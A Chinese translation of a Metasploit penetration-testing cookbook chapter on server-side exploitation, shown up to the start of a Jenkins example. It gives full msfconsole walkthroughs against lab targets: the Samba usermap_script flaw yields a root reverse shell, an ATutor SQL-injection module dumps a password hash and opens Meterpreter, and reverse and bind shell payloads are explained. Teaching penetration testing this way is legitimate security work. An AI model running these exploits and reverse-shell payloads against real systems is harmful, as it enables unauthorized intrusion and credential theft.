Metasploit 渗透测试手册第三版 第三章 服务端漏洞利用 实例

第三章 服务端漏洞利用

在本章中,我们将学习以下内容

1、攻击Linux服务器

2、SQL注入攻击

3、shell类型

4、攻击Windows服务器

5、利用公用服务

6、MS17-010 永恒之蓝 SMB远程代码执行Windows内核破坏

7、MS17-010 EternalRomance/EternalSynergy/EternalChampion

8、植入后门

9、拒绝服务攻击

简介

在第二章的信息收集和扫描中,我们收集了目标的IP地址,端口,服务,操作系统等信息。信息收集过程中最大的收获是服务器或系统的操作系统信息。这些信息对后续的渗透目标机器非常有用,因为我们可以快速查找系统上运行的服务和漏洞信息。这个过程有点复杂,但是有了这些信息可以很大程度减轻我们后续的工作。

每一个操作系统都存在一些缺陷。一旦漏洞被报告出来,漏洞利用程序开发也开始了。获得许可的操作系统,比如Windows,可以很快为漏洞或BUG开发补丁程序,并推送给用户更新。漏洞披露是一个严重的问题,特别是 0day 漏洞会对计算机行业造成严重破坏。0day 收到高度追捧,在市场上的价格可达 15000美元到1000000美元。漏洞被发现并被利用,但漏洞的披露取决于研究人员及其意图。

像微软、苹果和谷歌这样的知名企业会定期为他们的产品发布补丁,因为他们要为众多的用户负责。但在公司场景中,情况会变得更糟,由于涉及停机时间和确保业务连续性不受影响,服务器需要数周才能修补。因此,建议您更新或密切关注正在使用的操作系统中发现的任何最新漏洞。未修补的系统是黑客的最爱,因为他们会立即发动攻击,危及目标。因此,必须定期修补和更新操作系统。在本章中,我们将重点讨论一些最流行的服务和操作系统中报告的漏洞。

在渗透测试的过程中,一旦目标操作系统的信息可用,渗透人员就开始寻找针对特定服务或操作系统漏洞的可利用程序。因此,本章将是我们深入了解目标服务器端漏洞的第一步。我们将重点介绍一些使用广泛的windows操作系统和Linux操作系统。我们还将研究如何使用利用这些漏洞,并设置它们的参数,使它们能够在目标机器上执行。最后,我们将讨论 Metasploit 框架中的攻击载荷(payloads)。

在对目标机器攻击利用之前,我们首先要知道一些关于攻击模块和攻击载荷的基础知识,比如如何设置参数等。

为了对目标进行漏洞利用攻击,首先需要扫描目标的端口和服务,一旦收集了足够多的信息,下一步就是选择相对应的漏洞利用程序对目标进行攻击。让我们来学习一些 msfconsole中的漏洞利用命令。

关于 msfconsole 和如何启动 msfconsole ,在我们之前的章节已经讲解过了。

msfconsole 中,如果要查看帮助,可以直接输入 help 命令即可

  1. msf5 > help
  2. Core Commands
  3. =============
  4. Command Description
  5. ------- -----------
  6. ? Help menu
  7. banner Display an awesome metasploit banner
  8. cd Change the current working directory
  9. color Toggle color
  10. connect Communicate with a host
  11. exit Exit the console
  12. get Gets the value of a context-specific variable
  13. getg Gets the value of a global variable
  14. grep Grep the output of another command
  15. help Help menu
  16. history Show command history
  17. load Load a framework plugin
  18. quit Exit the console
  19. repeat Repeat a list of commands
  20. route Route traffic through a session
  21. save Saves the active datastores
  22. sessions Dump session listings and display information about session
  23. set Sets a context-specific variable to a value
  24. setg Sets a global variable to a value
  25. sleep Do nothing for the specified number of seconds
  26. spool Write console output into a file as well the screen
  27. threads View and manipulate background threads
  28. ....
  29. set RHOSTS fe80::3990:0000/110, ::1-::f0f0
  30. Target a block from a resolved domain name:
  31. set RHOSTS www.example.test/24
  32. msf5 >
  33. 复制代码

从输出结果来看,有许多的命令,你可能会被吓到。但之前我们已经了解了一些命令,比如数据库命令。现在我们将重点关注在漏洞利用阶段最有用的命令,并在过程中了解其他命令。

最有用的命令:search命令

  1. msf5 > search -h
  2. Usage: search [ options ] <keywords>
  3. OPTIONS:
  4. -h Show this help information
  5. -o <file> Send output to a file in csv format
  6. -S <string> Search string for row filter
  7. -u Use module if there is one result
  8. Keywords:
  9. aka : Modules with a matching AKA (also-known-as) name
  10. author : Modules written by this author
  11. arch : Modules affecting this architecture
  12. bid : Modules with a matching Bugtraq ID
  13. cve : Modules with a matching CVE ID
  14. edb : Modules with a matching Exploit-DB ID
  15. check : Modules that support the 'check' method
  16. date : Modules with a matching disclosure date
  17. description : Modules with a matching description
  18. full_name : Modules with a matching full name
  19. mod_time : Modules with a matching modification date
  20. name : Modules with a matching descriptive name
  21. path : Modules with a matching path
  22. platform : Modules affecting this platform
  23. port : Modules with a matching port
  24. rank : Modules with a matching rank (Can be descriptive (ex: 'good') or numeric with comparison operators (ex: 'gte400'))
  25. ref : Modules with a matching ref
  26. reference : Modules with a matching reference
  27. target : Modules affecting this target
  28. type : Modules of a specific type (exploit, payload, auxiliary, encoder, evasion, post, or nop)
  29. Examples:
  30. search cve:2009 type:exploit
  31. msf5 >
  32. 复制代码

通过 search我们可以查找非常多的东西,包括模块,漏洞等等。

1、攻击Linux服务器

Linux是使用最为广泛的操作系统之一,在前面的章节中,我们学习了如何扫描可用服务和利用漏洞扫描器扫描查找目标漏洞。在本节中,我们将使用Metasploitable2作为靶机,我们将利用Samba服务漏洞对Linux目标机进行攻击。

准备工作

首先,我们使用servives命令查找之前nmap的扫描结果,并过滤139445端口。

  1. msf5 > services -c port,info -p 139,445 192.168.177.145
  2. Services
  3. ========
  4. host port info
  5. ---- ---- ----
  6. 192.168.177.145 139 Samba smbd 3.X - 4.X workgroup: WORKGROUP
  7. 192.168.177.145 445 Samba smbd 3.X - 4.X workgroup: WORKGROUP
  8. msf5 >
  9. 复制代码

现在我们知道了目标Samba的版本信息,我们就可以去查找相对应的漏洞,然后使用search命令搜索可使用的攻击模块。

TIP:我们可以在通用漏洞披露(CVE)在线平台https://www.cvedetails.com中找到有关Samba 3.0.20漏洞的细节。

通过 search命令过滤 CVE模块类型关键字即可找到可利用的攻击模块。

  1. msf5 > search cve:2007 type:exploit samba
  2. Matching Modules
  3. ================
  4. # Name Disclosure Date Rank Check Description
  5. - ---- --------------- ---- ----- -----------
  6. 1 exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Yes Samba lsa_io_trans_names Heap Overflow
  7. 2 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
  8. 3 exploit/osx/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
  9. 4 exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
  10. msf5 >
  11. 复制代码
怎么做

1、选择攻击模块

  1. msf5 > use exploit/multi/samba/usermap_script
  2. msf5 exploit(multi/samba/usermap_script) >
  3. 复制代码

2、运行info可查看模块信息

  1. msf5 exploit(multi/samba/usermap_script) > info
  2. Name: Samba "username map script" Command Execution
  3. Module: exploit/multi/samba/usermap_script
  4. Platform: Unix
  5. Arch: cmd
  6. Privileged: Yes
  7. License: Metasploit Framework License (BSD)
  8. Rank: Excellent
  9. Disclosed: 2007-05-14
  10. ......
  11. Description:
  12. This module exploits a command execution vulnerability in Samba
  13. versions 3.0.20 through 3.0.25rc3 when using the non-default
  14. "username map script" configuration option. By specifying a username
  15. containing shell meta characters, attackers can execute arbitrary
  16. commands. No authentication is needed to exploit this vulnerability
  17. since this option is used to map usernames prior to authentication!
  18. References:
  19. https://cvedetails.com/cve/CVE-2007-2447/
  20. OSVDB (34700)
  21. http://www.securityfocus.com/bid/23972
  22. http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534
  23. http://samba.org/samba/security/CVE-2007-2447.html
  24. msf5 exploit(multi/samba/usermap_script) >
  25. 复制代码

通过模块描述信息,可用看出,该模块利用Samba 3.0.203.0.25rc中的命令执行漏洞。我们来试试。

3、配置参数

通过show missing命令,查看必须要配置的参数

  1. msf5 exploit(multi/samba/usermap_script) > show missing
  2. Module options (exploit/multi/samba/usermap_script):
  3. Name Current Setting Required Description
  4. ---- --------------- -------- -----------
  5. RHOSTS yes The target address range or CIDR identifier
  6. msf5 exploit(multi/samba/usermap_script) >
  7. 复制代码

TIP:要显示模块的高级选项,你可以使用show advanced 命令

这里只需要我们设置目标的IP地址即可,我们通过set [options] [value]来设置

  1. msf5 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.177.145
  2. RHOSTS => 192.168.177.145
  3. msf5 exploit(multi/samba/usermap_script) >
  4. 复制代码

4、攻击

执行exploit即可。

  1. msf5 exploit(multi/samba/usermap_script) > exploit
  2. [*] Started reverse TCP double handler on 192.168.177.143:4444
  3. [*] Accepted the first client connection...
  4. [*] Accepted the second client connection...
  5. [*] Command: echo 48vnI4nfAB1GTD5d;
  6. [*] Writing to socket A
  7. [*] Writing to socket B
  8. [*] Reading from sockets...
  9. [*] Reading from socket B
  10. [*] B: "48vnI4nfAB1GTD5d\r\n"
  11. [*] Matching...
  12. [*] A is input...
  13. [*] Command shell session 1 opened (192.168.177.143:4444 -> 192.168.177.145:51353) at 2019-04-26 13:14:08 +0800
  14. 复制代码

攻击成功后,我们将获得与目标机器的连接会话。我们可用执行一些命令,来验证是否获得了目标机器的权限。

  1. hostname
  2. metasploitable
  3. ip a show
  4. 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
  5. link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
  6. inet 127.0.0.1/8 scope host lo
  7. inet6 ::1/128 scope host
  8. valid_lft forever preferred_lft forever
  9. 2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
  10. link/ether 00:0c:29:cc:9a:ea brd ff:ff:ff:ff:ff:ff
  11. inet 192.168.177.145/24 brd 192.168.177.255 scope global eth0
  12. inet6 fe80::20c:29ff:fecc:9aea/64 scope link
  13. valid_lft forever preferred_lft forever
  14. 3: eth1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop qlen 1000
  15. link/ether 00:0c:29:cc:9a:f4 brd ff:ff:ff:ff:ff:ff
  16. id
  17. uid=0(root) gid=0(root)
  18. 复制代码

Ctrl+Z可将会话转到后台

  1. uid=0(root) gid=0(root)
  2. ^Z //按 Ctrl+Z
  3. Background session 1? [y/N] y
  4. msf5 exploit(multi/samba/usermap_script) >
  5. 复制代码

5、要操作会话,可用使用sessions命令

  1. msf5 exploit(multi/samba/usermap_script) > sessions -h
  2. Usage: sessions [options] or sessions [id]
  3. Active session manipulation and interaction.
  4. OPTIONS:
  5. -C <opt> Run a Meterpreter Command on the session given with -i, or all
  6. -K Terminate all sessions
  7. -S <opt> Row search filter.
  8. -c <opt> Run a command on the session given with -i, or all
  9. -d List all inactive sessions
  10. -h Help banner
  11. -i <opt> Interact with the supplied session ID
  12. -k <opt> Terminate sessions by session ID and/or range
  13. -l List all active sessions
  14. -n <opt> Name or rename a session by ID
  15. -q Quiet mode
  16. -s <opt> Run a script or module on the session given with -i, or all
  17. -t <opt> Set a response timeout (default: 15)
  18. -u <opt> Upgrade a shell to a meterpreter session on many platforms
  19. -v List all active sessions in verbose mode
  20. -x Show extended information in the session table
  21. Many options allow specifying session ranges using commas and dashes.
  22. For example: sessions -s checkvm -i 1,3-5 or sessions -k 1-2,5,6
  23. msf5 exploit(multi/samba/usermap_script) >
  24. 复制代码

6、要重新回到刚才的会话,可使用sessions -i [session_id]命令,使用sessions -l可查看所有激活的会话列表。

  1. msf5 exploit(multi/samba/usermap_script) > sessions -l
  2. Active sessions
  3. ===============
  4. Id Name Type Information Connection
  5. -- ---- ---- ----------- ----------
  6. 1 shell cmd/unix 192.168.177.143:4444 -> 192.168.177.145:51353 (192.168.177.145)
  7. msf5 exploit(multi/samba/usermap_script) > sessions -i 1
  8. [*] Starting interaction with 1...
  9. id
  10. uid=0(root) gid=0(root)
  11. ip a show
  12. 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
  13. link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
  14. inet 127.0.0.1/8 scope host lo
  15. inet6 ::1/128 scope host
  16. valid_lft forever preferred_lft forever
  17. 2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
  18. link/ether 00:0c:29:cc:9a:ea brd ff:ff:ff:ff:ff:ff
  19. inet 192.168.177.145/24 brd 192.168.177.255 scope global eth0
  20. inet6 fe80::20c:29ff:fecc:9aea/64 scope link
  21. valid_lft forever preferred_lft forever
  22. 3: eth1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop qlen 1000
  23. link/ether 00:0c:29:cc:9a:f4 brd ff:ff:ff:ff:ff:ff
  24. 复制代码

要终止会话,可用按Ctrl+c

  1. link/ether 00:0c:29:cc:9a:f4 brd ff:ff:ff:ff:ff:ff
  2. ^C //Ctrl+C
  3. Abort session 1? [y/N] y //输入 y
  4. ""
  5. [*] 192.168.177.145 - Command shell session 1 closed. Reason: User exit
  6. msf5 exploit(multi/samba/usermap_script) >
  7. 复制代码
它是如何工作的

Samba是用于LinuxWindows之间的打印和文件共享的服务。Samba 3.0.03.0.25rc3smbd中的MS-RPC功能允许远程攻击者通过SamrChangePassword功能的shell元字符执行任意命令,当启用smb.conf中“用户名映射脚本”选项时(不是默认启用的),允许远程认证的用户通过远程打印机中的其他MS-RPC功能的外部元字符执行命令,以及文件共享管理。该漏洞攻击模块通过指定一个用户名包含shell元字符,攻击者可以执行任意命令。 因为此选项用于在身份验证之前映射用户名,所以不需要身份验证就可以利用此漏洞。

有效攻击载荷?

我们没有指定payload,所以Metasploit默认为我们指定了payload。我们可用show options查看

  1. msf5 exploit(multi/samba/usermap_script) > show options
  2. Module options (exploit/multi/samba/usermap_script):
  3. Name Current Setting Required Description
  4. ---- --------------- -------- -----------
  5. RHOSTS 192.168.177.145 yes The target address range or CIDR identifier
  6. RPORT 139 yes The target port (TCP)
  7. Payload options (cmd/unix/reverse):
  8. Name Current Setting Required Description
  9. ---- --------------- -------- -----------
  10. LHOST 192.168.177.143 yes The listen address (an interface may be specified)
  11. LPORT 4444 yes The listen port
  12. Exploit target:
  13. Id Name
  14. -- ----
  15. 0 Automatic
  16. msf5 exploit(multi/samba/usermap_script) >
  17. 复制代码

可以看到,使用的payload是一个unix反向shell

我们可以通过show payloas列出当前攻击模块所有可用的攻击载荷。

  1. msf5 exploit(multi/samba/usermap_script) > show payloads
  2. Compatible Payloads
  3. ===================
  4. # Name Disclosure Date Rank Check Description
  5. - ---- --------------- ---- ----- -----------
  6. 1 cmd/unix/bind_awk normal No Unix Command Shell, Bind TCP (via AWK)
  7. 2 cmd/unix/bind_busybox_telnetd normal No Unix Command Shell, Bind TCP (via BusyBox telnetd)
  8. 3 cmd/unix/bind_inetd normal No Unix Command Shell, Bind TCP (inetd)
  9. 4 cmd/unix/bind_lua normal No Unix Command Shell, Bind TCP (via Lua)
  10. 5 cmd/unix/bind_netcat normal No Unix Command Shell, Bind TCP (via netcat)
  11. 6 cmd/unix/bind_netcat_gaping normal No Unix Command Shell, Bind TCP (via netcat -e)
  12. 7 cmd/unix/bind_netcat_gaping_ipv6 normal No Unix Command Shell, Bind TCP (via netcat -e) IPv6
  13. 8 cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl)
  14. 9 cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6
  15. 10 cmd/unix/bind_r normal No Unix Command Shell, Bind TCP (via R)
  16. 11 cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby)
  17. 12 cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
  18. 13 cmd/unix/bind_socat_udp normal No Unix Command Shell, Bind UDP (via socat)
  19. 14 cmd/unix/bind_zsh normal No Unix Command Shell, Bind TCP (via Zsh)
  20. 15 cmd/unix/generic normal No Unix Command, Generic Command Execution
  21. 16 cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet)
  22. 17 cmd/unix/reverse_awk normal No Unix Command Shell, Reverse TCP (via AWK)
  23. 18 cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)
  24. 19 cmd/unix/reverse_ksh normal No Unix Command Shell, Reverse TCP (via Ksh)
  25. 20 cmd/unix/reverse_lua normal No Unix Command Shell, Reverse TCP (via Lua)
  26. 21 cmd/unix/reverse_ncat_ssl normal No Unix Command Shell, Reverse TCP (via ncat)
  27. 22 cmd/unix/reverse_netcat normal No Unix Command Shell, Reverse TCP (via netcat)
  28. 23 cmd/unix/reverse_netcat_gaping normal No Unix Command Shell, Reverse TCP (via netcat -e)
  29. 24 cmd/unix/reverse_openssl normal No Unix Command Shell, Double Reverse TCP SSL (openssl)
  30. 25 cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl)
  31. 26 cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)
  32. 27 cmd/unix/reverse_php_ssl normal No Unix Command Shell, Reverse TCP SSL (via php)
  33. 28 cmd/unix/reverse_python normal No Unix Command Shell, Reverse TCP (via Python)
  34. 29 cmd/unix/reverse_python_ssl normal No Unix Command Shell, Reverse TCP SSL (via python)
  35. 30 cmd/unix/reverse_r normal No Unix Command Shell, Reverse TCP (via R)
  36. 31 cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby)
  37. 32 cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
  38. 33 cmd/unix/reverse_socat_udp normal No Unix Command Shell, Reverse UDP (via socat)
  39. 34 cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)
  40. 35 cmd/unix/reverse_zsh normal No Unix Command Shell, Reverse TCP (via Zsh)
  41. msf5 exploit(multi/samba/usermap_script) >
  42. 复制代码

我们还可以通过sessions -u [sessions_id] 可以将shell会话升级成meterpreter会话,从而可以利用meterpreter的高级功能。关于meterpreter会在后续的章节中详细讲解。

  1. msf5 exploit(multi/samba/usermap_script) > sessions -u 2
  2. [*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [2]
  3. [*] Upgrading session ID: 2
  4. [*] Starting exploit/multi/handler
  5. [*] Started reverse TCP handler on 192.168.177.143:4433
  6. [*] Sending stage (985320 bytes) to 192.168.177.145
  7. [*] Meterpreter session 3 opened (192.168.177.143:4433 -> 192.168.177.145:35189) at 2019-04-26 13:46:35 +0800
  8. [*] Command stager progress: 100.00% (773/773 bytes)
  9. 复制代码

2、SQL 注入

Metasploit有几个SQL注入漏洞的利用模块,使我们能够测试和验证目标是否易受攻击。

准备工作

我们将安装一个易受攻击的开源LMS:Atutor 2.2.1进行测试,访问www.exploit-db.com/exploits/39… ,点击VULNERABLE APP旁边的下载按钮开源下载Atutor 2.2.1

TIP:至于怎么安装 ATutor,可以查看官方文档。

怎么做

该模块利用了ATutor 2.2.1SQL注入漏洞和身份验证漏洞,这意味着我们可以绕过身份验证,访问管理接口,上传恶意代码。

1、使用exploit/multi/http/atutor_sqli模块,查看模块选项

  1. msf5 > use exploit/multi/http/atutor_sqli
  2. msf5 exploit(multi/http/atutor_sqli) > show options
  3. Module options (exploit/multi/http/atutor_sqli):
  4. Name Current Setting Required Description
  5. ---- --------------- -------- -----------
  6. Proxies no A proxy chain of format type:host:port[,type:host:port][...]
  7. RHOSTS yes The target address range or CIDR identifier
  8. RPORT 80 yes The target port (TCP)
  9. SSL false no Negotiate SSL/TLS for outgoing connections
  10. TARGETURI /ATutor/ yes The path of Atutor
  11. VHOST no HTTP server virtual host
  12. Exploit target:
  13. Id Name
  14. -- ----
  15. 0 Automatic
  16. msf5 exploit(multi/http/atutor_sqli) >
  17. 复制代码

2、攻击之前,可以通过check命令检测目标是否易受攻击。然后进行攻击

  1. msf5 exploit(multi/http/atutor_sqli) > check
  2. [+] 192.168.177.139:80 - The target is vulnerable.
  3. msf5 exploit(multi/http/atutor_sqli) >
  4. msf5 exploit(multi/http/atutor_sqli) > exploit
  5. [*] Started reverse TCP handler on 192.168.177.143:4444
  6. [*] 192.168.177.139:80 - Dumping the username and password hash...
  7. [*] Started reverse TCP handler on 192.168.177.143:4444
  8. [*] 192.168.177.139:80 - Dumping the username and password hash...
  9. [+] 192.168.177.139:80 - Got the root's hash: 9c352326223a09bc610ff4919e611bed3fbb28f5 !
  10. [*] Sending stage (38247 bytes) to 192.168.177.139
  11. [*] Meterpreter session 13 opened (192.168.177.143:4444 -> 192.168.177.139:50088) at 2019-04-28 13:53:36 +0800
  12. [!] This exploit may require manual cleanup of 'ytux.php' on the target
  13. [!] This exploit may require manual cleanup of '/var/content/module/zyq/ytux.php' on the target
  14. meterpreter >
  15. 复制代码

根据密码复杂度不同,所需时长也不同。攻击成功后,获取了shell

  1. meterpreter > getuid
  2. Server username: Administrator (0)
  3. meterpreter > sysinfo
  4. Computer : WIN-BGKRU85VR4H
  5. OS : Windows NT WIN-BGKRU85VR4H 6.1 build 7600 (Windows 7 Business Edition) i586
  6. Meterpreter : php/windows
  7. meterpreter >
  8. 复制代码

3、shell类型

在进行下一节内容的学习之前,我们先来讨论一些可用shell的类型。shell大体上分为两种,一种是bind shell一种是reverse shjell

bindshell 又叫正向连接shell。是指程序在目标机本地端口上监听,允许攻击者连接到监听端口。bind shell非常适合本地漏洞,比如当你已经通过钓鱼攻击成功危害了目标计算机,并希望利用本地服务提权的时候。但是它不适合远程攻击场景。因为通常来说目标位于防火墙后面。

所以大部分时候,我们更多的使用reverse shell,又称反向shell作为我们的有效攻击载荷。反向shell是在攻击者上监听端口,攻击程序在目标机上运行后主动连接到攻击者监听的端口。由于防火墙大多数时候只限制入站规则。因此反向shell更容易绕过防火墙。

Payloads

Metasploit中由三种不同类型的payload模块,分别是:singlesstagersstages

Singles:独立载荷,可直接植入目标系统并执行的程序,比如 shell_bind_tcp

Stagers:传输器载荷,负责建立网络连接,与stages载荷配合使用。这种载荷体积小且可靠

Stages:传输体载荷,在stagers建立好稳定的连接之后,提供的高级功能。如 shell,meterpreter, dllinject, patchupdllinject, upexec,vncinject等。metasploitmeterpreter其实就是一个payload。它需stagersstages配合使用。

准备工作

在上一节中的SQL注入中,已经获得一个有效的漏洞利用。所以我们将使用它来测试不同类型的payload

怎么做

1、使用show payloads命令显示可用的载荷。

  1. msf5 exploit(multi/http/atutor_sqli) > show payloads
  2. Compatible Payloads
  3. ===================
  4. # Name Disclosure Date Rank Check Description
  5. - ---- --------------- ---- ----- -----------
  6. 1 generic/custom normal No Custom Payload
  7. 2 generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
  8. 3 generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
  9. 4 php/bind_perl normal No PHP Command Shell, Bind TCP (via Perl)
  10. 5 php/bind_perl_ipv6 normal No PHP Command Shell, Bind TCP (via perl) IPv6
  11. 6 php/bind_php normal No PHP Command Shell, Bind TCP (via PHP)
  12. 7 php/bind_php_ipv6 normal No PHP Command Shell, Bind TCP (via php) IPv6
  13. 8 php/download_exec normal No PHP Executable Download and Execute
  14. 9 php/exec normal No PHP Execute Command
  15. 10 php/meterpreter/bind_tcp normal No PHP Meterpreter, Bind TCP Stager
  16. 11 php/meterpreter/bind_tcp_ipv6 normal No PHP Meterpreter, Bind TCP Stager IPv6
  17. 12 php/meterpreter/bind_tcp_ipv6_uuid normal No PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
  18. 13 php/meterpreter/bind_tcp_uuid normal No PHP Meterpreter, Bind TCP Stager with UUID Support
  19. 14 php/meterpreter/reverse_tcp normal No PHP Meterpreter, PHP Reverse TCP Stager
  20. 15 php/meterpreter/reverse_tcp_uuid normal No PHP Meterpreter, PHP Reverse TCP Stager
  21. 16 php/meterpreter_reverse_tcp normal No PHP Meterpreter, Reverse TCP Inline
  22. 17 php/reverse_perl normal No PHP Command, Double Reverse TCP Connection (via Perl)
  23. 18 php/reverse_php normal No PHP Command Shell, Reverse TCP (via PHP)
  24. msf5 exploit(multi/http/atutor_sqli) >
  25. 复制代码

2、查看载荷的详细信息,使用info <payload>指令

  1. msf5 exploit(multi/http/atutor_sqli) > info payload/generic/shell_bind_tcp
  2. Name: Generic Command Shell, Bind TCP Inline Module: payload/generic/shell_bind_tcp Platform: All Arch: x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, p
  3. hp, java, ruby, dalvik, python, nodejs, firefox, zarch, r
  4. Needs Admin: No
  5. Total size: 0 Rank: Normal
  6. Provided by:
  7. skape <mmiller@hick.org>
  8. Basic options:
  9. Name Current Setting Required Description
  10. ---- --------------- -------- -----------
  11. LPORT 4444 yes The listen port
  12. RHOST no The target address
  13. Description:
  14. Listen for a connection and spawn a command shell
  15. msf5 exploit(multi/http/atutor_sqli) >
  16. 复制代码

3、generic/shell_bind_tcp是一个独立载荷。要选择它作为有效载荷,我们使用set payload <payload_name>

  1. msf5 exploit(multi/http/atutor_sqli) > set payload generic/shell_bind_tcp
  2. payload => generic/shell_bind_tcp
  3. msf5 exploit(multi/http/atutor_sqli) > exploit
  4. [*] 192.168.177.139:80 - Dumping the username and password hash...
  5. 复制代码

4、使用generic/shell_bind_tcp载荷可用得到一个通用的shell,但远远不够,PHP Meterprete是一个特性丰富且更高级的载荷,我们可以用它来利用此漏洞。

  1. msf5 exploit(multi/http/atutor_sqli) > info payload/php/meterpreter/reverse_tcp
  2. Name: PHP Meterpreter, PHP Reverse TCP Stager
  3. Module: payload/php/meterpreter/reverse_tcp
  4. Platform: PHP
  5. Arch: php
  6. Needs Admin: No
  7. Total size: 1101
  8. Rank: Normal
  9. Provided by:
  10. egypt <egypt@metasploit.com>
  11. Basic options:
  12. Name Current Setting Required Description
  13. ---- --------------- -------- -----------
  14. LHOST yes The listen address (an interface may be specified)
  15. LPORT 4444 yes The listen port
  16. Description:
  17. Run a meterpreter server in PHP. Reverse PHP connect back stager
  18. with checks for disabled functions
  19. msf5 exploit(multi/http/atutor_sqli) >
  20. 复制代码
  1. msf5 exploit(multi/http/atutor_sqli) > set PAYLOAD php/meterpreter/reverse_tcp
  2. PAYLOAD => php/meterpreter/reverse_tcp
  3. msf5 exploit(multi/http/atutor_sqli) > set LHOST 192.168.177.143
  4. LHOST => 192.168.177.143
  5. [*] Started reverse TCP handler on 192.168.177.143:4444
  6. [*] 192.168.177.139:80 - Dumping the username and password hash...
  7. [+] 192.168.177.139:80 - Got the root's hash: 9c352326223a09bc610ff4919e611bed3fbb28f5 !
  8. [*] Sending stage (38247 bytes) to 192.168.177.139
  9. [*] Meterpreter session 14 opened (192.168.177.143:4444 -> 192.168.177.139:51063) at 2019-04-28 16:42:49 +0800
  10. [!] This exploit may require manual cleanup of 'bgxx.php' on the target
  11. [!] This exploit may require manual cleanup of '/var/content/module/glt/bgxx.php' on the target
  12. meterpreter >
  13. [+] 192.168.177.139:80 - Deleted bgxx.php
  14. meterpreter > getuid
  15. Server username: Administrator (0)
  16. meterpreter > sysinfo
  17. Computer : WIN-BGKRU85VR4H
  18. OS : Windows NT WIN-BGKRU85VR4H 6.1 build 7600 (Windows 7 Business Edition) i586
  19. Meterpreter : php/windows
  20. meterpreter >
  21. 复制代码

4、攻击Windows 服务器

利用之前收集的信息,我们将对Windows服务器作为目标进行漏洞利用。本节我们将使用Metasploitable3作为靶机。

准备工作

通过收集的信息,查找漏洞,选择合适的漏洞里利用模块。

使用services查看目标Apache服务版本。

  1. msf5 > services -p 8020 192.168.177.144
  2. Services
  3. ========
  4. host port proto name state info
  5. ---- ---- ----- ---- ----- ----
  6. 192.168.177.144 8020 tcp http open Apache httpd
  7. msf5 >
  8. 复制代码

访问目标站点

通过浏览目标站点,我们可以尝试使用弱口令进行登录,比如 admin

居然登录进去了。

怎么做

1、查看运行在 8484端口的 Jenkins-CI服务。

  1. msf5 > services 192.168.177.144 -p 8484
  2. Services
  3. ========
  4. host port proto name state info
  5. ---- ---- ----- ---- ----- ----
  6. 192.168.177.144 8484 tcp http open Jetty winstone-2.8
  7. 复制代码

这里,并没有显示 Jenkins,浏览器访问看看

确实是一个 Jenkins服务

我们使用search jenkins搜索可利用的模块

  1. msf5 > search jenkins
  2. Matching Modules
  3. ================
  4. # Name Disclosure Date Rank Check Description
  5. - ---- --------------- ---- ----- -----------
  6. 1 auxiliary/gather/jenkins_cred_recovery normal Yes Jenkins Domain Credential Recovery
  7. 2 auxiliary/scanner/http/jenkins_command normal Yes Jenkins-CI Unauthenticated Script-Console Scanner
  8. 3 auxiliary/scanner/http/jenkins_enum normal Yes Jenkins-CI Enumeration
  9. 4 auxiliary/scanner/http/jenkins_login normal Yes Jenkins-CI Login Utility
  10. 5 auxiliary/scanner/jenkins/jenkins_udp_broadcast_enum normal No Jenkins Server Broadcast Enumeration
  11. 6 exploit/linux/misc/jenkins_java_deserialize 2015-11-18 excellent Yes Jenkins CLI RMI Java Deserialization Vulnerability
  12. 7 exploit/linux/misc/jenkins_ldap_deserialize 2016-11-16 excellent Yes Jenkins CLI HTTP Java Deserialization Vulnerability
  13. 8 exploit/linux/misc/opennms_java_serialize 2015-11-06 normal No OpenNMS Java Object Unserialization Remote Code Execution
  14. 9 exploit/multi/http/jenkins_metaprogramming 2019-01-08 excellent Yes Jenkins ACL Bypass and Metaprogramming RCE
  15. 10 exploit/multi/http/jenkins_script_console 2013-01-18 good Yes Jenkins-CI Script-Console Java Execution
  16. 11 exploit/multi/http/jenkins_xstream_deserialize 2016-02-24 excellent Yes Jenkins XStream Groovy classpath Deserialization Vulnerability
  17. 12 exploit/windows/misc/ibm_websphere_java_deserialize 2015-11-06 excellent No IBM WebSphere RCE Java Deserialization Vulnerability
  18. 13 post/multi/gather/jenkins_gather normal No Jenkins Credential Collector
  19. msf5 >
  20. 复制代码

使用Jenkins-CI Script-Console Java Execution模块

  1. msf5 > use exploit/multi/http/jenkins_script_console
  2. msf5 exploit(multi/http/jenkins_script_console) > set RHOSTS 192.168.177.144
  3. RHOSTS => 192.168.177.144
